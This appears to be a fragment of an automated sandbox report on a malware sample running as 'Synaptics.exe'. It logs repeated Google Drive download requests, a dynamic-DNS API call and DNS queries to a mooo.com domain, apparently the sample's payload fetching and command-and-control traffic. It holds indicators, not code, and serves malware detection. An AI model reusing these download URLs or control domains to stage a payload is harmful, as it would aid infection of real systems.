                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.000000000568B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7rVb56kWIUGEPmBMlYQwC6A6G1Vd9XqSVkka3xjOatZW_FzrzB9TXITNbjbtLRWZvXn6nWVcEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-IegQaAnFp37VGCaLXp_HPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c; expires=Tue, 01-Jul-2025 10:48:02 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6PGaNEjSf0r3jOLaNdNdIuIyGDeiMC_WVsTyyPPxC6Zlu-ApKtt_lX8B4SRy02Bk0WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-1fHraLoSn_iJxvBlDZLC6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8; expires=Tue, 01-Jul-2025 10:48:02 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7VjRdgJBQTp2ivCHCqMng-XZiu-osy1H3244r7IhVfEycbi3Yc9jIntUs4tSuQwT7aContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:03 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-IQnp4UwSABBLLKI8Wu7Zhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0; expires=Tue, 01-Jul-2025 10:48:03 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5oxzMQQXrbkAfIHmBpCtXl798smnyoAxB7AekObd9w-_IqzDU6R_kVjS2_wuctMvOzq75n1ZcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:03 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-UMBFZutEM33kzhxtGFhkOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7TcpVJqTYCpF2oN8THm4_WNtu_rDYnPjVlr2N_olAGFwu5Mt5ZuhsUbUyz-ctsCugz-H6TmxsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--rVWic90ABqllac5iUL0Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
